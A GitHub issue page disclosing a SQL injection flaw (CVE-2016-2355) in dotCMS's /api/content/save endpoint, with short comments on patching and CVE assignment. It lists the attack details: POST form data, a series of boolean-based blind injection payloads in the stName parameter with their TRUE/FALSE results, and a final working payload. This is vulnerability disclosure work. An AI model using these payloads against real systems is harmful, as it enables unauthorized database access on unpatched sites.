SQL Injection Vulnerability(CVE-2016-2355) #8848
Comments
|
may I ask this vulnerability currently has new progress it? |
|
This issue in the process of being patched for release. |
|
CERT has assigned CVE-2016-2355 to this issue |
futurelighthouse
changed the title
|
Hello,can you update the Credit in http://dotcms.com/security/SI-35 |
oarrietadotcms
added a commit
that referenced
this issue
Apr 18, 2016
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Attack details
url: http://localhost:8080/api/content/save/1
postdata:address1=e&address2=e&city=e&contactMe=false&email=sample%40email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus
URL encoded POST input stName was set to -1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'='
Tests performed:
-1' OR 2+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => TRUE
-1' OR 3+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2<(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 3_2>(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 2+1-1-1=1 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 00053=00053 AND 3+1-1-1=1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=5 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 3_2_0=6 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
Original value: RequestProspectus
Parameter: stName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: address1=e&address2=e&city=e&contactMe=false&email=sample@email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus' AND 6745=6745 AND 'ajDn'='ajDn
The text was updated successfully, but these errors were encountered: